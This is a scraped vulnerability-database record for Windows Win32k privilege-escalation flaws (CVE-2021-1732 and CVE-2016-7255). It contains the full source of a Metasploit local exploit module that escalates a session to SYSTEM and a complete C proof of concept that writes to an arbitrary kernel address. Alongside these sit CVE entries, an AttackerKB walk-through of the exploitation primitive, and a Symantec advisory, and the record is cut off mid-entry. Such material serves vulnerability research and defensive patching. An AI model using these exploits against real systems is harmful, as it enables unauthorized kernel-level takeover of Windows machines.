{"id": "PACKETSTORM:161880", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Win32k ConsoleControl Offset Confusion", "description": "", "published": "2021-03-19T00:00:00", "modified": "2021-03-19T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html", "reporter": "Spencer McIntyre", "references": [], "cvelist": ["CVE-2016-7255", "CVE-2021-1732"], "lastseen": "2021-03-19T17:08:44", "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-1732", "CVE-2016-7255"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74"]}, {"type": "seebug", "idList": ["SSV:92530"]}, {"type": "symantec", "idList": ["SMNTC-94064"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786206", "MYHACK58:62201784568", "MYHACK58:62201682548"]}, {"type": "mscve", "idList": ["MS:CVE-2016-7255", "MS:CVE-2021-1732"]}, {"type": "cisa", "idList": ["CISA:911DE59572B6EF78B42DD868D622F637"]}, {"type": "threatpost", "idList": ["THREATPOST:F10810414F1898BE0159A069C1B719B2", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "fireeye", "idList": ["FIREEYE:8B4453AF3FA94076D63CCBDB94AFC782", "FIREEYE:3E714A2B7BA85E8C1459F38BE1BC289A", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294"]}, {"type": "exploitdb", "idList": ["EDB-ID:40745", "EDB-ID:40823", "EDB-ID:41015"]}, {"type": "zdt", "idList": ["1337DAY-ID-26297", "1337DAY-ID-26645", "1337DAY-ID-26414"]}, {"type": "thn", "idList": ["THN:89E2A7A39CBD630AB15218875ED90D19", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:F8BDC767F3D202913920E1C28D137377", "THN:0C87C22B19E7073574F7BA69985A07BF"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3FDA4C818CF6EA61DD6359696752E123", "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "EXPLOITPACK:3A596E79FE66F4077B2897D4B2D5D53B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140468", "PACKETSTORM:139701"]}, {"type": "canvas", "idList": ["MS16_135"]}, {"type": "securelist", "idList": ["SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "SECURELIST:A3D3514100806269750A23D748D34C59"]}, {"type": "mmpc", "idList": ["MMPC:11F96360F6FFA25D4AC7028A2E9CAA9D"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7"]}, {"type": "mskb", "idList": ["KB3199135"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310809092"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_FEB_4601354.NASL", "SMB_NT_MS16-135.NASL", "SMB_NT_MS21_FEB_4601319.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "kaspersky", "idList": ["KLA11832", "KLA10897"]}], "modified": "2021-03-19T17:08:44", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-03-19T17:08:44", "rev": 2}, "vulnersScore": 6.9}, "sourceHref": "https://packetstormsecurity.com/files/download/161880/cve_2021_1732_win32k.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'Win32k ConsoleControl Offset Confusion', \n'Description' => %q{ \nA vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of \nNT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being \ntreated as an offset despite being populated by an attacker-controlled value. This can be leveraged to \nachieve an out of bounds write operation, eventually leading to privilege escalation. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'BITTER APT', # exploit as used in the wild \n'JinQuan', # detailed analysis \n'MaDongZe', # detailed analysis \n'TuXiaoYi', # detailed analysis \n'LiHao', # detailed analysis \n'KaLendsi', # github poc targeting v1909 \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Targets' => \n[ \n[ 'Windows 10 v1803-20H2 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n[ 'CVE', '2021-1732' ], \n[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], \n[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], \n[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], \n# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit \n[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], \n[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], \n[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], \n[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ] \n], \n'DisclosureDate' => '2021-02-10', \n'DefaultTarget' => 0, \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ] \n} \n} \n) \n) \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19042) \nprint_error('The exploit only supports Windows 10 versions 1803 - 20H2') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nencoded_payload = payload.encoded \nexecute_dll( \n::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-1732', 'CVE-2021-1732.x64.dll'), \n[encoded_payload.length].pack('I<') + encoded_payload \n) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T06:28:11", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T07:00:00", "title": "CVE-2016-7255", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-7255", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-03-26T12:44:52", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T23:15:00", "title": "CVE-2021-1732", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-03-26T02:46:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004"], "id": "CVE-2021-1732", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-03-19T21:17:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at February 10, 2021 10:03pm UTC reported:\n\nA very interesting vulnerability in win32kfull.sys on Windows 10 devices up to and including 20H2. Although the exploit in the wild specifically targeted Windows 10 v1709 to Windows 10 v1909, as noted at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>, the researchers noted that the vulnerability could be modified to work on Windows 20H2 with minor modifications.\n\nFrom my perspective this is rather significant, particularly given this is a win32kfull.sys bug we are talking about here. Most of the primitives that made win32k exploitation easier were entirely wiped out by Microsoft which prompted a lot of researchers who previously spoke publicly about such primitives in conference talks and similar to go quiet. Whilst rumor has been that there were other primitives one could use for exploitation, they were considered closely guarded secrets due to the difficulty in finding them and the fact that Microsoft would be likely to patch them very quickly.\n\nThe new primitive that is used here appears to be setting tagMenuBarInfo.rcBar.left and tagMenuBarInfo.rcBar.top and then calling GetMenuBarInfo(), which allows one to perform an arbitrary read in kernel memory. This has not been discussed before but is similar to another concepted discussed in the paper \u201cLPE vulnerabilities exploitation on Windows 10 Anniversary Update\u201d at ZeroNights which mentioned using two adjacent Windows and then setting the cbwndExtra field of the first window to a large value to allow the first window to set all of the properties of the second window. By chaining this together the attacker could achieve an arbitrary read and write in kernel memory.\n\nThe bug itself stems from a xxxClientAllocWindowClassExtraBytes() callback within win32kfull!xxxCreateWindowEx. Specifically when xxxCreateWindowEx() creates a window object with a cbwndExtra field set, aka it has extra Window bytes, it will perform a xxxClientAllocWindowClassExtraBytes() callback to usermode to allocate the extra bytes for the Window.\n\nYou may be wondering why such callbacks are needed. Well a long time ago Windows used to handle all its graphics stuff in kernel mode, but then people realized that was too slow given increasing demands for speed, so they made most of the code operate in usermode with key stuff handled by kernel mode. This lead to a big rift and is the reason we have callbacks. Thats the nutshell version anyway but go read up on <http://mista.nu/research/mandt-win32k-slides.pdf> and <https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf> if you want to learn more. Its a fascinating read :)\n\nAnyway back on topic. Since xxxClientAllocWindowClassExtraBytes() is a callback that is under the attackers controller, the attacker can set a hook that will trigger when a xxxClientAllocWindowClassExtraBytes() callback is made and call NtUserConsoleControl() with the handle of the window that is currently being operated on. This will end up calling xxxConsoleControl() in kernel mode which will set *((tagWND+0x28)+0x128) to an offset, and will AND the flag at *((tagWND+0x28) + 0xE8) with 0x800 to indicate that the value of the WndExtra member is an offset from the base address of RtlHeapBase. Unfortunately, whatever value is returned by the hooked xxxClientAllocWindowClassExtraBytes() callback (aka whatever value the attacker chooses) will be used as the value of WndExtra, since remember we are meant to be allocating the address of this field at the time due to the earlier xxxCreateWindowEx() call needing to allocate memory for WndExtra.\n\nOnce this is done, the callback will be completed, execution will return to usermode, and a call to DestroyWindow() will be made from usermode. This will cause xxxDestroyWindow() to be called in kernel mode which will call xxxFreeWindow(), which will check if *((tagWND+0x28) + 0xE8) has the flag designated by 0x800 set, which it will due to the alterations made by xxxConsoleControl(). This will then result in a call to RtlFreeHeap() which will attempt to free an address designated by RtlHeapBase + offset, where offset is the value of WndExtra (which is taken from the xxxClientAllocWindowClassExtraBytes() callback and therefore completely controlled by the attacker).\n\nThis subsequently results in the attacker being able to free memory at an arbitrary address in memory.\n\nI\u2019ll not dive into a full detailed analysis of the rest of the exploitation steps as the article at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/> is very comprehensive but I will say from what I\u2019ve read there, there is enough detail that people of a decent skill level could probably recreate this exploit. It certainly isn\u2019t an easy exploit to recreate but the exploit goes into a lot of detail about the various mitigation bypasses that were used to make this exploit possible, which could help an attacker more readily recreate this bug.\n\nAgain, this exploit was exploited in the wild so it is possible for this bug to be recreated, it just might take some time for people to work out a few of the specifics needed to get a working exploit. If you are running Windows 10, it is highly advised to upgrade as soon as possible: everything I am reading here points to signs that this will be weaponized within the coming few weeks or months.\n\nAdditionally it should be noted that this exploit was noted to be capable of escaping Microsoft IE\u2019s sandbox (but not Google Chrome\u2019s) so if you are running Microsoft IE within your environment, its even more imperative that you patch this issue to prevent an attacker from combining this with an IE 0day and conducting a drive by attack against your organization, whereby simply browsing a website could lead to attackers gaining SYSTEM level privileges against affected systems.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2021-03-04T00:00:00", "published": "2021-02-25T00:00:00", "id": "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "href": "https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732", "type": "attackerkb", "title": "CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-17T06:17:08", "bulletinFamily": "info", "cvelist": ["CVE-2021-1732", "CVE-2021-27072", "CVE-2021-28310"], "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 13, 2021 8:41pm UTC reported:\n\nAh, another day, another Win32k privilege escalation used in the wild. [Securelist has a good write-up](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>) on this bug, which they discovered because it was used in a BITTER APT zero-day attack in (it sounds like) conjunction with [CVE-2021-1732](<https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e>) (there\u2019s a Metasploit module for the second vuln).\n", "modified": "2021-04-17T00:00:00", "published": "2021-04-13T00:00:00", "id": "AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "href": "https://attackerkb.com/topics/pKKVzHnVRA/cve-2021-28310", "type": "attackerkb", "title": "CVE-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:02:45", "description": "If the Windows kernel-mode drivers do not properly handle objects in memory, then there will be multiple elevation of Privilege vulnerabilities. Successful exploitation of this vulnerability an attacker can run in kernel mode arbitrary code. An attacker could then install programs; view, change, or delete data; or create with full user permissions to the new account.\n\nThe attacker must first log in to the system, and then to exploit these vulnerabilities. Then the attacker can run a exploit these vulnerabilities and through the Special design of the application, allowing control of the affected system. The update addresses the vulnerabilities by correcting Windows kernel-mode driver handles objects in memory to resolve these vulnerabilities.\n", "published": "2016-11-10T00:00:00", "type": "seebug", "title": "Win32k elevation of privilege vulnerability MS16-135\uff09(CVE-2016-7255)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92530", "id": "SSV:92530", "sourceData": "\n // \u53c2\u8003 https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n\r\n do \r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\r\n va_start(VaList,Format);\r\n\r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n\r\n va_end(VaList);\r\n\r\n } while (FALSE);\r\n\r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n\r\n return ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n\r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n\r\n\r\n int nFinalRet = -1;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n\r\n Sleep(1000);\r\n\r\n }\r\n\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n\r\n return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n\r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n\r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n\r\n do \r\n {\r\n\r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n\r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n\r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n\r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n\r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n\r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n\r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n SetParent(hWndChild , GetDesktopWindow() );\r\n\r\n SetForegroundWindow(hWndChild);\r\n\r\n _sim_alt_shift_tab(4);\r\n\r\n SwitchToThisWindow(hWndChild , TRUE);\r\n\r\n _sim_alt_shift_esc();\r\n\r\n\r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n\r\n\r\n } while (FALSE);\r\n\r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n\r\n if ( NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n\r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n return 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do \r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92530"}], "symantec": [{"lastseen": "2018-03-14T22:39:48", "bulletinFamily": "software", "cvelist": ["CVE-2016-7255"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-11-08T00:00:00", "published": "2016-11-08T00:00:00", "id": "SMNTC-94064", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/94064", "type": "symantec", "title": "Microsoft Windows Kernel 'Win32k.sys' CVE-2016-7255 Local Privilege Escalation Vulnerability", "cvss": 